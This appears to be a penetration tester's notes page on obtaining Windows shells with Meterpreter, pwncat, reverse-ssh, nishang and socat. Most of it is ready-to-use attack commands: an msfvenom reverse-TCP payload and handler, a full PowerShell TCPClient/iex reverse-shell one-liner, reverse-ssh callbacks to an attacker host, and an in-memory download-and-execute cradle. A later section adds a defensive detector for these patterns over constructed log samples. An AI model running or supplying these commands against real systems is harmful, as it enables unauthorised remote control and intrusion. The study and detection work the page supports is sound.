# Shells

## Normal Shells

{% embed url="https://book.hacktricks.xyz/shells/shells/windows" %}

### Meterpreter

First, generate the file which, when executed, starts a reverse shell on the targeted host. Here's an example of an aspx shell:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx
```

Then, in your attacker machine, run Metasploit and start a handler:

```
msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LPORT 4444 
set LHOST 10.10.14.73 
run
```

Replace the IP address and port with your own, of course.

### Interactive Powershell Reverse Shell

Caveat: **stderr doesn't work!**

```
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

## Full TTY Shells

{% embed url="https://book.hacktricks.xyz/shells/shells/full-ttys#full-tty" %}

### Pwncat

Caveat: I've tested it on 2 Windows boxes in HTB, and it **didn't work in either one**.

It's probably a good idea to switch to bash if you're using zsh:

```
exec bash --login
```

If your target machine doesn't have internet access, then you'll need to download the plugins first:

```
pwncat --download-plugins
```

Listen on port 4444:

```
pwncat -m windows -lp 4444
```

Then connect to pwncat with either a powershell.exe or cmd.exe reverse shell, pointed at the listener's IP and port (4444 above):

```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

### Reverse SSH Shell

{% embed url="https://github.com/Fahrj/reverse-ssh" %}

Features:

* Full TTY shell
* File sharing via SFTP
* Port forwarding

[Requirements](https://github.com/Fahrj/reverse-ssh#requirements):

* At least Windows 7 or Windows Server 2008 (Windows 10 for conpty; lower Windows versions need a workaround for full TTY functionality)
* Linux kernel version 2.6.23 and higher

Caveats:

* SCP doesn't seem to work
* SSH port forwarding doesn't seem to work
* It hangs sometimes

Evades antivirus: unknown

First run this on your machine:

```
./reverse-ssh -v -l :4444
```

Then run the following on the victim machine (you can use the UPX-packed executable; on older machines use ssh-shellhost, see the workaround below):

```
.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP
```

And finally on your machine:

```
ssh -p 8888 127.0.0.1
```

The default password is **letmeinbrudipls**.

**NB!** If the target doesn't have conpty (pre-Windows 10 build 17763), then you need the following workaround:

```
.\upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP
```

The ssh-shellhost.exe executable needs to be in the same directory as reverse-ssh. It comes from the [Win32-OpenSSH releases](https://github.com/PowerShell/Win32-OpenSSH/releases/).

### Rlwrap with nishang

{% embed url="https://book.hacktricks.xyz/shells/shells/windows#ps-nishang" %}

Serve the Invoke-PowerShellTcp.ps1 script from your machine. Then, on the target, download the nishang shell into memory:

```
powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');
```

Start a listener on SOME_PORT on the attacker machine, wrapping it in [rlwrap](https://infinitelogins.com/2020/12/12/improving-windows-powershell-reverse-shells-for-up-down-arrows/) as explained there (not tested).

Then run the reverse shell:

```
Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT
```
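A defender-side check for the PowerShell patterns used in the interactive, pwncat and nishang sections above (the TCPClient/iex one-liner and the Net.WebClient download cradle), added here as an example that is not part of the original page: it runs indicator combinations over constructed Event ID 4104 script-block samples. The event field names and all sample values (addresses, record IDs, script text) are assumptions, not real telemetry.

```python
"""Detection for this page's reverse-shell patterns over constructed 4104 samples."""
import re

# Each indicator alone is noisy; RULES below require combinations.
INDICATORS = {
    "tcp_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "stream_loop": re.compile(r"\.GetStream\(\)", re.I),
    "exec_input": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(r"Net\.WebClient\)\.DownloadString\(", re.I),
    "nishang_tcp": re.compile(r"Invoke-PowerShellTcp\b", re.I),
}
# Rule -> indicators that must all appear in one script block.
RULES = {
    "powershell_tcp_reverse_shell": {"tcp_client", "stream_loop", "exec_input"},
    "download_cradle_to_memory": {"download_cradle", "exec_input"},
    "nishang_reverse_shell": {"nishang_tcp"},
}

def classify(script_block: str) -> dict:
    """Return the indicators found and the rules they satisfy (sorted)."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(script_block)}
    rules = [r for r, needed in sorted(RULES.items()) if needed <= hits]
    return {"indicators": sorted(hits), "rules": rules}

def triage(events: list) -> list:
    """Return (EventRecordID, rules) for every 4104 event that trips a rule."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue  # only script-block logging carries the script text
        rules = classify(ev["ScriptBlockText"])["rules"]
        if rules:
            alerts.append((ev["EventRecordID"], rules))
    return alerts

# Constructed sample events; 203.0.113.0/24 is a documentation address range.
SAMPLE_EVENTS = [
    {"EventID": 4104, "EventRecordID": 1, "ScriptBlockText":
     "$client = New-Object System.Net.Sockets.TCPClient('203.0.113.5',4444);"
     "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)"},
    {"EventID": 4104, "EventRecordID": 2, "ScriptBlockText":
     "iex (New-Object Net.WebClient).DownloadString('http://203.0.113.5:8000/Invoke-PowerShellTcp.ps1')"},
    {"EventID": 4104, "EventRecordID": 3, "ScriptBlockText":
     "Invoke-Expression 'Get-Date'"},  # iex alone: an indicator, but no rule
    {"EventID": 4103, "EventRecordID": 4, "ScriptBlockText":
     "New-Object System.Net.Sockets.TCPClient"},  # not a 4104 event: skipped
]

if __name__ == "__main__":
    for rec, rules in triage(SAMPLE_EVENTS):
        print(f"record {rec}: {', '.join(rules)}")
```

Event ID 4104 only exists when PowerShell script block logging is enabled; the `powershell -nop -exec bypass` launch line itself shows up in process-creation telemetry (e.g. Sysmon Event ID 1) rather than in the script block text.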

### Socat

I think socat can be used to make a decent reverse shell?

{% embed url="https://stackoverflow.com/questions/60287549/socat-how-to-create-a-windows-reverse-shell" %}

